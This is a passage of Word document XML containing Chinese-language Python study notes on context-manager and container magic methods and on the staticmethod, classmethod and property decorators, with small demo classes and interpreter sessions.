    <w:p w14:paraId="307A33D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. __enter__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的返回值被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的目标或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后的名字绑定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2309D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__exit__(self, exc_type, exc_value, traceback)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当一个代码块被执行或者终止后上下文管理器应该做什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D0499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般被用来处理异常，清除工作或者做一些代码块执行完毕之后的日常工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E641B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973E50B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26AF7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__len__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> len() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为（返回容器中元素的个数）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2715BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__getitem__(self, key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义获取容器中指定元素的行为，相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> self[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79F0DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__setitem__(self, key, value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义设置容器中指定元素的行为，相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> self[key] = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041A3C22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__delitem__(self, key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义删除容器中指定元素的行为，相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> del self[key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81A2EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__iter__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当迭代容器中的元素的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153DE8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__reversed__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> reversed() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D7E4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__contains__(self, item)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当使用成员测试运算符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> not in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432F092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3143C50A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEAECB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>装饰器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428831C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.weixueyuan.net/a/700.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE96398" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9EBE0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>类装饰器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDA7B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31477A09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class DemoClass1(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21765A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    attr1 = 1                   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C60E53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@staticmethod               # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>静态方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D203F66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def static_func1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192CFD34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(DemoClass1.attr1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA82DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        DemoClass1.attr1 += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B435C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@classmethod                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3E9A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def class_func1(cls):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B68AB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(cls.attr1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4AEC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        cls.attr1 += 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0E9F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DemoClass1.static_func1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727CB05A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DemoClass1.class_func1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348654C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DemoClass1.static_func1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EEEF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DemoClass1.class_func1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD18A89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BC94B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A12BDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; class PropertyDemo1(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C5D6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59391BE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.field1 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF552F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.field2 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3F318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>另外一个常见的装饰器是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，该装饰器表明被装饰函数会在读取与函数同名的属性时被调用，并且得到的是被装饰函数的返回值。注意，该属性是只读的，不能被赋值。下面是一个例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B1C5D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@property </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFDF69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def count(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2AA738" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         return self.field1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5DF4A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...                                       # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类定义结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F4DF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj1 = PropertyDemo1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE9F20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; obj1.count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8B506A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D98B86B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1.count = 4                        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只读属性，不能被赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E7A668" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE7ACD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "&lt;stdin&gt;", line 1, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE6B68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AttributeError: can't set attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB2A5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D24BA06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果希望可读也可写，那么需要先定义一个被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> property </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰的函数，然后定义一个被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> setter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰的函数。下面是一个例子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350177A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14575AA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; class GetterSetter(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D28C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23526D61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.field1 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3AEB4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@property                               # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>表明是一个属性，默认是只读的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6179E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
